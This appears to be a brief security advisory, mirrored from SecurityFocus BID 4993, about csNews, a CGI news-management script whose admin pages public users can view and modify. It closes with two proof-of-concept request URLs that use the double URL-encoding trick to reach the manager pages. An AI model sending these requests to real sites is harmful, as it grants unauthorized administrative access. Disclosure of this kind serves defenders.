9 lines
No EOL
539 B
Text
9 lines
No EOL
539 B
Text
source: http://www.securityfocus.com/bid/4993/info
|
|
|
|
csNews is a script for managing news items on a website. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems.
|
|
|
|
Users with "public" access to the system may be able to view and modify some administration pages. This is accomplished by submitting a HTTP request in which some metacharacters are double URL encoded.
|
|
|
|
|
|
CSNews.cgi?database=default%2edb&command=showadv&mpage=manager
|
|
CSNews.cgi?command=manage&database=default%2edb&mpage=manager |